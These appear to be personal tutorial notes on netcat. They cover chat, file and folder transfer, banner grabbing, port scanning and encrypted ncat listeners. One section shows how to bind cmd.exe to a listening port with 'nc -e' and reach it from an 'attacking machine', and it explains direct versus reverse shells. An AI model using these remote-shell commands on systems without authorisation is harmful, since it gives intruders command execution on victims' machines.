Netcat


Use netcat to chat

Use listen command on the server side. nc -l -p <port> Connect to the server from client on the same port.
nc <server> <port> Can be done on the same machine also.


Use netcat to send a file

Use server machine to give command
nc -v -w 30 -p <port> -l < file.txt On the client machine give command nc -v -w 2 <server ip> <port> > receivedfile.txt -w is for wait and the -v is for verbose output. The file.txt will be received as receivedfile.txt on the client machine. Works on local machine as well. Test.


Netcat for banner grabbing

It can be done with telnet as well but this does not alter the stream of data unlike telnet. Just nc to the ip using a specific port to get the info regarding the server running.


Port scanning

Use -z for zero input output. nc -v <ip> -z <port-start>-<port-end> -n option can also be used. This does not do a DNS scan on the given ip address which does save time. Even -w can be used to wait specified number of seconds.


Execute remote shell on windows

To execute a remote shell on windows, get an nc command executed as follows nc -lp <port> -vv -e cmd.exe Then execute nc on the attacking machine as follows nc <ip> <port> It is always unencrypted. Since this is always unsafe, there is a version of netcat called cryptcat which has two fish encryption. If the listener uses the -e option it is called a direct shell. If the connecting machine uses the -e option it is called a reverse shell. This can help in situations where not both the machines on the network can port forward.


Netcat to transfer files between two systems on a network

To transfer a folder having the files to be sent, on the sender use command tar -cf - <foldername> | nc -l -p 1337 On the receiving machine type command nc <sender ip> 1337 | tar -xf -


Ncat

ncat is a more modern version of netcat which is implemented by nmap libraries. It has support for multiple protocols and transmission over ssl. On the listener type ncat [options] [arguments] --allow <allowed ip> -vln <port> --ssl Only connections from allowed ip will be allowed will have an encrypted channel. The connection will be allowed but not established form the allowed ip if the command from that ip does not contain the ssl option. On allowed ip type ncat -vn <listener> <l port> --ssl